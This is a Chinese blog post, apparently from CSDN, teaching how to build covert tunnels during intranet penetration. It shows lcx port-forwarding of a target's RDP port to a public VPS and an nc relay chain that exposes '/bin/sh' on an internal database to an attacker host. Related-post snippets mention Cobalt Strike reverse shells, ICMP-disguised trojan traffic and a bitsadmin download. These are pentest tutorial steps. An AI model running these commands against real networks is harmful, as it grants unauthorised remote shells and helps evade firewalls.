内网渗透--建立隐藏通信隧道

最新推荐文章于 2024-10-15 11:33:34 发布
原创 最新推荐文章于 2024-10-15 11:33:34 发布
· 532 阅读 · 5 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了在内网渗透中如何利用LCX和NC进行端口转发,以绕过防火墙限制。通过LCX工具进行内网端口转发和本地端口映射,实现对目标服务器的远程访问。同时,利用NC代理转发,通过边界机与内网数据库建立通信。这些技术在网络安全测试和漏洞利用中具有重要作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

内网渗透--建立隐藏通信隧道

传输层隧道技术

传输层技术包括TCP 隧道、UDP 隧道、和常见的端口转发等。在渗透测试中,如果内网防火墙阻止了对指定端口的访问,在获得目标机器的权限后,可以使用IPTABLES打开指定端口。

1、lcx 端口转发

LCX是一个基于socket 套接字实现的端口转发工具。windows版本为lcx.exe,Linux 版本为 portmap。

1.1 内网端口转发
在目标机器上执行如下命令,将目标机器3389端口的所有数据转发到公网vps的4444 端口上
lcx.exe -slave 公网主机IP  4444 127.0.0.1 3389
在vps 上执行如下命令,将本机4444端口上监听的所有数据转发到本机的5555 端口上。
lcx.exe -listen 4444 5555
此时,我们使用 mstsc 连接 <公网IP地址>:5555,即可访问目标服务器的3389端口。
1.2 本地端口映射
如果目标主机的部分端口(如3389)被防火墙拦截时,我们可以通过目标主机相应端口的数据传到防火墙允许的其他端口(如53)。
在目标主机上执行如下命令,就可以直接从远程桌面连接到目标主机的53端口了。
lcx.exe -tran <目标主机IP地址> 3389

2、NC 代理转发

通过边界机作代理,使kali与数据库通信,访问内网数据库:

攻击机:192.136.100.111 (公网IP)
WEB边界机:192.168.1.100 10.10.10.100
内网数据库:10.10.10.200

攻击机执行:
nc -lvp 3333
数据库执行:
nc -lvp 3333 -e /bin/sh
web服务器执行:
nc -v 192.136.100.111 3333 -c "nc -v 10.10.10.200 3333"
内网渗透-Linux内网渗透
lza20001103的博客
08-16 2016
内网渗透-Linux内网渗透
内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术
最新发布
2401_87966937的博客
01-19 1783
此监听器IP地址要设置为服务端的IP地址,端口为刚才设置的7777端口,相当于木马执行后,会去访问服务端的7777端,而之前的设置就是将服务端的7777端口信息转发到本地6666端口。若目标主机的出网TCP被禁止,但是ICMP协议是能够通信的,所以通过SPP将目标主机上的TCP流量伪装为ICMP协议转发给服务端。客户端配置需要在目标主机上进行执行此命令,将本地的TCP伪装为ICMP所以需要转发本地的端口。客户端开启CS,配置监听器。CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。
第三章——隐藏通信隧道技术
willow_liang的博客
12-22 3377
网络隧道 1.pingtunnel 1.在web边界服务器上下载并运行ptunnel http://freshmeat.sourceforge.net/projects/ptunnel ptunnel -x pass -×指定icmp隧道连接验证密码 -lp指定要监听的本地tcp端口 -da指定要转发到的机器的ip地址 -dp指定要转发到的机器的tcp端口 -p指定icmp隧道另一端机器的ip地址 2.在vps上运行ptunnel ptunnel -p 192...
构建隐藏通信隧道
求学者的博客
10-15 979
通过实验能够描述并运用网络、传输、应用和SOCKS代理隧道技术。(1)理解反向代理,能够描述反向代理;(2)理解网络隧道,能够描述并运用网络隧道技术;(3)理解传输隧道,能够描述并运用传输隧道技术;(4)理解应用隧道,能够描述并运用应用隧道技术;(5)理解SOCKS代理,能够描述并运用SOCKS代理。(1)简述反向代理原理反向代理是一种网络技术,用于在服务器端接收客户端请求,并将这些请求转发到内部网络的其他服务器上。
隐藏通信隧道技术
qq_43590351的博客
08-30 5493
渗透内网隧道建立
内网渗透隐藏通信隧道
focus on security
06-22 2633
前言 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。 一、隐藏通信隧道基础知识 隧道 隧道技术是一种通过使用互联网络的基本设施在网络之间传递数据的方式,使用隧道传递的数据(或负载)可以是不同
内网渗透测试:隐藏通讯隧道技术(上)
weixin_46236101的博客
10-06 713
什么是隧道? 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。 常用的隧道技术有以下三种: 网络:IPv6 隧道、ICMP 隧道 传输:TCP 隧道、UDP 隧道、常规端口转发 应用:SSH 隧
内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透
网络空间安全学习
05-30 1393
spp隧道代理工具支持的协议: TCP、UDP、RUDP(可靠 UDP)、RICMP(可靠 ICMP)、RHTTP(可靠 HTTP)、KCP、Quic 支持类型: 正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理 协议和类型可以自由组合 外部代理协议和内部转发协议可以自由组合。 本工具使用简单,服务器、客户机各一条命令,就可建立连接。
内网渗透-防火墙出入规则上线-正反向连接+隧道技术-SMB+防火墙控制
xiaoheizi的博客
11-10 479
想要通过windows10正向连接拿下windows2008时,发现windows2008开启了防火墙对入站规则做了限制,无法正向连接。拿下win2008后,我们还想要让win2012也上线cs,但是因为win2008限制了入站规则,所以无法再使用反向连接上线。前提:已经使用攻击机通过漏洞拿下了windows7主机,又通过windows7正向连接拿下了windows10。开启防火墙:netsh advfirewall set allprofiles state on。2.生成后门,使用此监听器。
内网渗透之设置内网代理隧道
mudi13的博客
09-05 1698
只要能设置代理的工具 ,都可以使用。代理的端口设置在 CS服务器所在的主机
内网渗透建立隧道
shy的博客
09-01 4297
一、探测内网服务器出网协议 windows系统 1,icmp协议出网探测 ping自己的IP地址 2,DNS协议出网探测 ping www.baidu.com nslookup www.baidu.com 3,TCP出网探测 telnet vps ip 2,nc 攻击机:nc -lvvp 4444 受害机:nc vps-ip 4444 3, bitsadmin /rawreturn /transfer down "http://120.79.66.58.
内网渗透基石篇--隐藏通信隧道技术(下)
qq_44005305的博客
07-31 218
内网隐藏通信隧道就学到这里了,中间参考了一些大佬的思路。中途做了几个实验,用来学习一些常用工具的使用,工具只有在使用的时候我觉得理解的更快啊![外链图片转存中…(img-xXBlvC00-1690719460220)]4. 利用bitsadmin上传YY6 03.7.6 利用powershell 上传bitsadmin 可以用来在windows 命令行下下载文件。bitsadmin是 windows 后台智能传输服务的一个工具,windows的自动更新,补丁之类的下载就是用这个工具来实现的。
内网渗透-隐藏通信隧道技术
qq_44806973的博客
12-05 1811
隐藏隧道技术基础知识什么是隧道判断内网连通性网络隧道技术IPv6 隧道 基础知识   一般的网络通信,先在两台机器之间建立TCP连接,再进行正常通信。知道IP地址可直接发送报文。不知道IP地址,就需要将域名解析成IP(DNS)。 什么是隧道   这里的隧道,就是绕过端口屏蔽的方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙与其通信。被封装的数据包到达目的地后,将数据包还原,并将还原后的数据包发送给响应服务器。   常见的隧道: 网络:IPv6隧道、ICMP隧道、GR
内网安全之隧道技术
Askshhbs的博客
04-14 2158
未来的黑客大佬!我们终于找到你了~ 想要获取更多免费学习资料可搜索公众号:“掌控安全课堂” 后台回复”我想学黑客“即可 知识点 隧道 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。 代
内网渗透隧道
nigo134的博客
05-14 1306
安全实验室 | 利用EarthWorm实现内网穿透 相信我们在内网渗透的过程中总会遇到各种各样配置复杂的网络区域,有的能通DMZ、有的能互联、有的不能通外网等等。有时我们好不容易拿下了一台机器的权限,却被限制在他的网络分区中无法深入,彻夜难眠。少年不要灰心,不妨我们一起学习内网穿透的姿势,分分钟搞穿内网不是梦! 01、内网穿透原理1)什么是内网穿透 专业点来讲内网穿透就是利用各种隧道技术,以网络防火墙允许的协议,绕过网络防火墙的封锁,实现访问被封锁的目标网络。通俗点来说,就是电脑A和电脑B分别在两
横向移动:隐藏通信隧道技术_网络.(遨游于 内网任何主机)
网络安全领域___专研者.
04-29 3819
隧道技术的概括: 隧道就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上。
横向移动:隐藏通信隧道技术_传输.(遨游于 内网任何主机)
网络安全领域___专研者.
04-30 3183
隧道技术的概括: 隧道就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上。
内网渗透端口转发建立隧道流程图
01-07
### 关于内网渗透测试中通过端口转发建立隧道的流程 在执行内网渗透测试过程中,当面对内外网络隔离的情况时,通常采用隧道技术实现对外部攻击者与内部目标之间的通信。此过程涉及多个关键技术环节,具体如下: #### 1. 准备阶段 - 攻击方获取一台位于外部互联网上的服务器作为跳板机。 - 跳板机上安装必要的工具和服务(如SSH服务),用于后续操作。 #### 2. 连接建立 - 使用受控设备(已入侵或合法授权)从内网发起至跳板机的安全连接请求,比如利用SSH协议创建加密通道[^1]。 ```bash ssh -R 2222:localhost:22 user@jumpserver_ip ``` 这段命令表示将本地机器的22号端口映射到远端服务器的2222号端口上。 #### 3. 隧道构建 - 成功建立安全连接后,在两者间形成一条稳定的双向数据传输路径——即所谓的“隧道”。这条隧道允许外部人员间接访问原本被防火墙阻挡的目标系统资源[^2]。 #### 4. 访问控制 - 对于Linux主机而言,可以进一步探索其开放端口及相关服务详情,甚至尝试定位敏感文件位置,如数据库配置文件等,从而收集更多潜在可用的信息以辅助下一步行动[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值